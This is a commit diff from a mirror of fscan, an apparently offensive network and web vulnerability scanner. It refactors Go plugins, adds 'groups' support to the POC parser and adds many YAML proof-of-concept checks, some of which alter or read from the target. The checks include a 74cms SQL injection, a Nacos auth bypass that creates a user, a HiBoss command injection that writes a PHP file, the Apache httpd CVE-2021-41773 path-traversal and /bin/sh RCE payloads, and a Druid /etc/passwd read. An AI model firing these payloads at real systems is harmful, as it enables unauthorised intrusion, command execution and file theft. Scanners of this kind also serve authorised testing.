mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-07-13 21:02:44 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity

优化xray解析模块,支持groups、新增poc

Browse Source
This commit is contained in:
影舞者 2021-11-16 11:53:46 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
Plugins/redis.go
View File

@ -45,10 +45,14 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
defer func() {
if conn != nil{
conn.Close()
}
}()
if err != nil {
return flag, err
}
defer conn.Close()
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
if err != nil {
return flag, err
@ -81,10 +85,14 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
defer func() {
if conn != nil{
conn.Close()
}
}()
if err != nil {
return flag, err
}
defer conn.Close()
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
if err != nil {
return flag, err

2
Plugins/scanner.go
View File

@ -38,7 +38,7 @@ func Scan(info common.HostInfo) {
fmt.Println("start vulscan")
for _, targetIP := range AlivePorts {
info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
if info.Scantype == "all" {
if info.Scantype == "all" || info.Scantype == "main"{
switch {
case info.Ports == "445":
//AddScan(info.Ports, info, ch, &wg) //smb

16
Plugins/webtitle.go
View File

@ -121,17 +121,17 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
}
}
res, err := http.NewRequest("GET", Url, nil)
req, err := http.NewRequest("GET", Url, nil)
if err == nil {
res.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
res.Header.Set("Accept", "*/*")
res.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
req.Header.Set("Accept", "*/*")
req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
if common.Pocinfo.Cookie != "" {
res.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
req.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
} else {
res.Header.Set("Cookie", "rememberMe=1")
req.Header.Set("Cookie", "rememberMe=1")
}
res.Header.Set("Connection", "close")
req.Header.Set("Connection", "close")
var client *http.Client
if flag == 1 {
@ -140,7 +140,7 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
client = lib.Client
}
resp, err := client.Do(res)
resp, err := client.Do(req)
if err == nil {
defer resp.Body.Close()
var title string

70
WebScan/lib/check.go
View File

@ -32,9 +32,9 @@ func CheckMultiPoc(req *http.Request, Pocs embed.FS, workers int, pocname string
for i := 0; i < workers; i++ {
go func() {
for task := range tasks {
isVul, _ := executePoc(task.Req, task.Poc)
isVul, _ ,name:= executePoc(task.Req, task.Poc)
if isVul {
result := fmt.Sprintf("[+] %s %s", task.Req.URL, task.Poc.Name)
result := fmt.Sprintf("[+] %s %s %s", task.Req.URL, task.Poc.Name,name)
common.LogSuccess(result)
}
wg.Done()
@ -53,7 +53,7 @@ func CheckMultiPoc(req *http.Request, Pocs embed.FS, workers int, pocname string
close(tasks)
}
func executePoc(oReq *http.Request, p *Poc) (bool, error) {
func executePoc(oReq *http.Request, p *Poc) (bool, error,string) {
c := NewEnvOption()
c.UpdateCompileOptions(p.Set)
if len(p.Sets) > 0 {
@ -65,13 +65,13 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
}
env, err := NewEnv(&c)
if err != nil {
//fmt.Printf("environment creation error: %s\n", err)
return false, err
fmt.Printf("[-] %s environment creation error: %s\n",p.Name,err)
return false, err, ""
}
req, err := ParseRequest(oReq)
if err != nil {
//fmt.Println("ParseRequest error",err)
return false, err
fmt.Printf("[-] %s ParseRequest error: %s\n",p.Name,err)
return false, err, ""
}
variableMap := make(map[string]interface{})
variableMap["request"] = req
@ -119,7 +119,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
out, err := Evaluate(env, p.Set["payload"], variableMap)
if err != nil {
//fmt.Println(p.Name," poc_payload error",err)
return false, err
return false, err, ""
}
variableMap["payload"] = fmt.Sprintf("%v", out)
}
@ -153,14 +153,21 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
}
success := false
//爆破模式,比如tomcat弱口令
if setslen > 0 {
if haspayload {
success, err = clusterpoc1(oReq, p, variableMap, req, env, setskeys)
} else {
success, err = clusterpoc(oReq, p, variableMap, req, env, setslen, setskeys)
}
} else {
for _, rule := range p.Rules {
return success, nil, ""
}
DealWithRule := func(rule Rules) (bool, error) {
var (
flag, ok bool
)
for k1, v1 := range variableMap {
_, isMap := v1.(map[string]string)
if isMap {
@ -201,7 +208,6 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
for k, v := range result {
variableMap[k] = v
}
//return false, nil
} else {
return false, nil
}
@ -211,14 +217,44 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
return false, err
}
//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
if fmt.Sprintf("%v", out) == "false" { //如果false不继续执行后续rule
success = false // 如果最后一步执行失败,就算前面成功了最终依旧是失败
//如果false不继续执行后续rule
// 如果最后一步执行失败,就算前面成功了最终依旧是失败
flag, ok = out.Value().(bool)
if !ok {
flag = false
}
return flag, nil
}
DealWithRules := func(rules []Rules) bool {
successFlag := false
for _, rule := range rules {
flag, err := DealWithRule(rule)
//if err != nil {
// fmt.Printf("[-] %s Execute Rule error: %s\n",p.Name,err.Error())
//}
if err != nil || !flag { //如果false不继续执行后续rule
successFlag = false // 如果其中一步为flag则直接break
break
}
success = true
successFlag = true
}
return successFlag
}
if len(p.Rules) > 0 {
success = DealWithRules(p.Rules)
} else { // Groups
for name, rules := range p.Groups {
success = DealWithRules(rules)
if success {
return success, nil, name
}
}
}
return success, nil
return success, nil, ""
}
func doSearch(re string, body string) map[string]string {
@ -308,7 +344,7 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
}
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[0]+"}}", var1)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
success, err = clustersend(oReq, variableMap, req, env, rule)
success, err = clustersend(oReq, variableMap, req, env, rule1)
if err != nil {
return false, err
}
@ -334,7 +370,7 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[1]+"}}", var2)
rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[1]+"}}", var2)
success, err = clustersend(oReq, variableMap, req, env, rule)
success, err = clustersend(oReq, variableMap, req, env, rule1)
if err != nil {
return false, err
}

58
WebScan/lib/http.pb.go
View File

@ -5,13 +5,40 @@ package lib
import (
"embed"
fmt "fmt"
proto "github.com/golang/protobuf/proto"
"fmt"
"github.com/golang/protobuf/proto"
"gopkg.in/yaml.v3"
math "math"
"math"
"strings"
)
type Poc struct {
Name string `yaml:"name"`
Set map[string]string `yaml:"set"`
Sets map[string][]string `yaml:"sets"`
Rules []Rules `yaml:"rules"`
Groups map[string][]Rules `yaml:"groups"`
Detail Detail `yaml:"detail"`
}
type Rules struct {
Method string `yaml:"method"`
Path string `yaml:"path"`
Headers map[string]string `yaml:"headers"`
Body string `yaml:"body"`
Search string `yaml:"search"`
FollowRedirects bool `yaml:"follow_redirects"`
Expression string `yaml:"expression"`
}
type Detail struct {
Author string `yaml:"author"`
Links []string `yaml:"links"`
Description string `yaml:"description"`
Version string `yaml:"version"`
}
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
@ -356,36 +383,15 @@ var fileDescriptor_11b04836674e6f94 = []byte{
0xff, 0xff, 0x2a, 0xe0, 0x6d, 0x45, 0x24, 0x03, 0x00, 0x00,
}
type Poc struct {
Name string `yaml:"name"`
Set map[string]string `yaml:"set"`
Sets map[string][]string `yaml:"sets"`
Rules []Rules `yaml:"rules"`
Detail Detail `yaml:"detail"`
}
type Rules struct {
Method string `yaml:"method"`
Path string `yaml:"path"`
Headers map[string]string `yaml:"headers"`
Body string `yaml:"body"`
Search string `yaml:"search"`
FollowRedirects bool `yaml:"follow_redirects"`
Expression string `yaml:"expression"`
}
type Detail struct {
Author string `yaml:"author"`
Links []string `yaml:"links"`
Description string `yaml:"description"`
Version string `yaml:"version"`
}
func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
var pocs []*Poc
for _, f := range SelectPoc(Pocs, pocname) {
if p, err := loadPoc(f, Pocs); err == nil {
pocs = append(pocs, p)
}else {
fmt.Println("[-] load poc ",f," error:",err)
}
}
return pocs

16
WebScan/pocs/74cms-sqli-1.yml Normal file
View File

@ -0,0 +1,16 @@
name: poc-yaml-74cms-sqli-1
set:
rand: randomInt(200000000, 210000000)
rules:
- method: POST
path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
headers:
Content-Type: 'text/xml'
body: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{rand}})#</Content></xml>
follow_redirects: false
expression: |
response.body.bcontains(bytes(md5(string(rand))))
detail:
author: betta(https://github.com/betta-cyber)
links:
- https://www.uedbox.com/post/29340

12
WebScan/pocs/74cms-sqli-2.yml Normal file
View File

@ -0,0 +1,12 @@
name: poc-yaml-74cms-sqli-2
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23
expression: |
response.body.bcontains(bytes(md5(string(rand))))
detail:
author: rexus
links:
- https://www.uedbox.com/post/30019/

10
WebScan/pocs/74cms-sqli.yml Normal file
View File

@ -0,0 +1,10 @@
name: poc-yaml-74cms-sqli
rules:
- method: GET
path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a
expression: |
response.body.bcontains(b"ef775988943825d2871e1cfa75473ec")
detail:
author: jinqi
links:
- https://www.t00ls.net/articles-54436.html

11
WebScan/pocs/active-directory-certsrv-detect.yml Normal file
View File

@ -0,0 +1,11 @@
name: poc-yaml-active-directory-certsrv-detect
rules:
- method: GET
path: /certsrv/certrqad.asp
follow_redirects: false
expression: |
response.status == 401 && "Server" in response.headers && response.headers["Server"].contains("Microsoft-IIS") && response.body.bcontains(bytes("401 - ")) && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("Negotiate") && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("NTLM")
detail:
author: AgeloVito
links:
- https://www.cnblogs.com/EasonJim/p/6859345.html

10
WebScan/pocs/airflow-unauth.yml Normal file
View File

@ -0,0 +1,10 @@
name: poc-yaml-airflow-unauth
rules:
- method: GET
path: /admin/
expression: |
response.status == 200 && response.body.bcontains(b"<title>Airflow - DAGs</title>") && response.body.bcontains(b"<h2>DAGs</h2>")
detail:
author: pa55w0rd(www.pa55w0rd.online/)
links:
- http://airflow.apache.org/

19
WebScan/pocs/alibaba-canal-default-password.yml Normal file
View File

@ -0,0 +1,19 @@
name: poc-yaml-alibaba-canal-default-password
rules:
- method: POST
path: /api/v1/user/login
expression: |
response.status == 200 && response.body.bcontains(b"com.alibaba.otter.canal.admin.controller.UserController.login")
- method: POST
path: /api/v1/user/login
headers:
Content-Type: application/json
body: >-
{"username":"admin","password":"123456"}
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
detail:
author: jweny(https://github.com/jweny)
links:
- https://www.cnblogs.com/xiexiandong/p/12888582.html

15
WebScan/pocs/alibaba-nacos-api-unauth.yml
View File

@ -1,15 +0,0 @@
name: poc-yaml-alibaba-nacos-api-unauth
rules:
- method: GET
path: /nacos/v1/auth/users?pageNo=1&pageSize=9
headers:
User-Agent: Nacos-Server
follow_redirects: true
expression: |
response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
detail:
author: AgeloVito
info: alibaba-nacos-api-unauth
login: nacos/nacos
links:
- https://blog.csdn.net/caiqiiqi/article/details/112005424

27
WebScan/pocs/alibaba-nacos-v1-auth-bypass.yml Normal file
View File

@ -0,0 +1,27 @@
name: poc-yaml-alibaba-nacos-v1-auth-bypass
set:
r1: randomLowercase(16)
r2: randomLowercase(16)
rules:
- method: POST
path: "/nacos/v1/auth/users?username={{r1}}&password={{r2}}"
headers:
User-Agent: Nacos-Server
expression: |
response.status == 200 && response.body.bcontains(bytes("create user ok!"))
- method: GET
path: "/nacos/v1/auth/users?pageNo=1&pageSize=999"
headers:
User-Agent: Nacos-Server
expression: |
response.status == 200 && response.body.bcontains(bytes(r1))
- method: DELETE
path: "/nacos/v1/auth/users?username={{r1}}"
headers:
User-Agent: Nacos-Server
expression: |
response.status == 200 && response.body.bcontains(bytes("delete user ok!"))
detail:
author: kmahyyg(https://github.com/kmahyyg)
links:
- https://github.com/alibaba/nacos/issues/4593

18
WebScan/pocs/amtt-hiboss-server-ping-rce.yml Normal file
View File

@ -0,0 +1,18 @@
name: poc-yaml-amtt-hiboss-server-ping-rce
set:
r2: randomLowercase(10)
rules:
- method: GET
path: /manager/radius/server_ping.php?ip=127.0.0.1|echo%20"<?php%20echo%20md5({{r2}});unlink(__FILE__);?>">../../{{r2}}.php&id=1
expression: |
response.status == 200 && response.body.bcontains(b"parent.doTestResult")
- method: GET
path: /{{r2}}.php
expression: |
response.status == 200 && response.body.bcontains(bytes(md5(r2)))
detail:
author: YekkoY
description: "安美数字-酒店宽带运营系统-远程命令执行漏洞"
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

11
WebScan/pocs/apache-ambari-default-password.yml Normal file
View File

@ -0,0 +1,11 @@
name: poc-yaml-apache-ambari-default-password
rules:
- method: GET
path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
headers:
Authorization: Basic YWRtaW46YWRtaW4=
expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR")
detail:
author: wulalalaaa(https://github.com/wulalalaaa)
links:
- https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide

24
WebScan/pocs/apache-druid-cve-2021-36749.yml Normal file
View File

@ -0,0 +1,24 @@
name: poc-yaml-apache-druid-cve-2021-36749
manual: true
transport: http
groups:
druid1:
- method: POST
path: /druid/indexer/v1/sampler?for=connect
headers:
Content-Type: application/json;charset=utf-8
body: |
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}}},"samplerConfig":{"numRows":500}}
expression: response.status == 200 && response.content_type.contains("json") && "root:[x*]:0:0:".bmatches(response.body)
druid2:
- method: POST
path: /druid/indexer/v1/sampler?for=connect
headers:
Content-Type: application/json;charset=utf-8
body: |
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///c://windows/win.ini"]}}},"samplerConfig":{"numRows":500}}
expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"for 16-bit app support")
detail:
author: iak3ec(https://github.com/nu0l)
links:
- https://mp.weixin.qq.com/s/Fl2hSO-y60VsTi5YJFyl0w

6
WebScan/pocs/apache-flink-upload-rce.yml
View File

@ -7,8 +7,7 @@ rules:
path: /jars
follow_redirects: true
expression: >
response.status == 200 && response.content_type.contains("json") &&
response.body.bcontains(b"address") && response.body.bcontains(b"files")
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"address") && response.body.bcontains(b"files")
- method: POST
path: /jars/upload
headers:
@ -23,8 +22,7 @@ rules:
follow_redirects: true
expression: >
response.status == 200 && response.content_type.contains("json") &&
response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
search: >-
(?P<filen>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))
- method: DELETE

12
WebScan/pocs/apache-httpd-cve-2021-40438-ssrf.yml Normal file
View File

@ -0,0 +1,12 @@
name: poc-yaml-apache-httpd-cve-2021-40438-ssrf
manual: true
transport: http
rules:
- method: GET
path: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets
follow_redirects: false
expression: response.status == 302 && response.headers["Location"] == "http://www.baidu.com/search/error.html"
detail:
author: Jarcis-cy(https://github.com/Jarcis-cy)
links:
- https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438

16
WebScan/pocs/apache-httpd-cve-2021-41773-path-traversal.yml Normal file
View File

@ -0,0 +1,16 @@
name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
groups:
cgibin:
- method: GET
path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
icons:
- method: GET
path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: JingLing(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ

14
WebScan/pocs/apache-httpd-cve-2021-41773-rce.yml Normal file
View File

@ -0,0 +1,14 @@
name: poc-yaml-apache-httpd-cve-2021-41773-rce
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
body: echo;expr {{r1}} + {{r2}}
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773

10
WebScan/pocs/apache-kylin-unauth-cve-2020-13937.yml Normal file
View File

@ -0,0 +1,10 @@
name: poc-yaml-apache-kylin-unauth-cve-2020-13937
rules:
- method: GET
path: /kylin/api/admin/config
expression: |
response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
detail:
author: JingLing(github.com/shmilylty)
links:
- https://s.tencent.com/research/bsafe/1156.html

12
WebScan/pocs/apache-nifi-api-unauthorized-access.yml Normal file
View File

@ -0,0 +1,12 @@
name: poc-yaml-apache-nifi-api-unauthorized-access
manual: true
transport: http
rules:
- method: GET
path: /nifi-api/flow/current-user
follow_redirects: false
expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true")
detail:
author: wulalalaaa(https://github.com/wulalalaaa)
links:
- https://nifi.apache.org/docs/nifi-docs/rest-api/index.html

2
WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml
View File

@ -11,7 +11,7 @@ rules:
version="1.0"?><methodCall><methodName>{{rand}}</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand)))
detail:
author: su(https://suzzz112113.github.io/#blog)
links:

21
WebScan/pocs/apache-solr-file-read.yml
View File

@ -1,21 +0,0 @@
name: poc-yaml-apache-solr-file-read
rules:
- method: GET
path: "/solr/admin/cores?indexInfo=false&wt=json"
search: |
"name":"(?P<core_name>.+?)",
expression:
response.status == 200
- method: POST
path: "/solr/{{core_name}}/config"
headers:
Content-type: application/json
body: |
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
expression: |
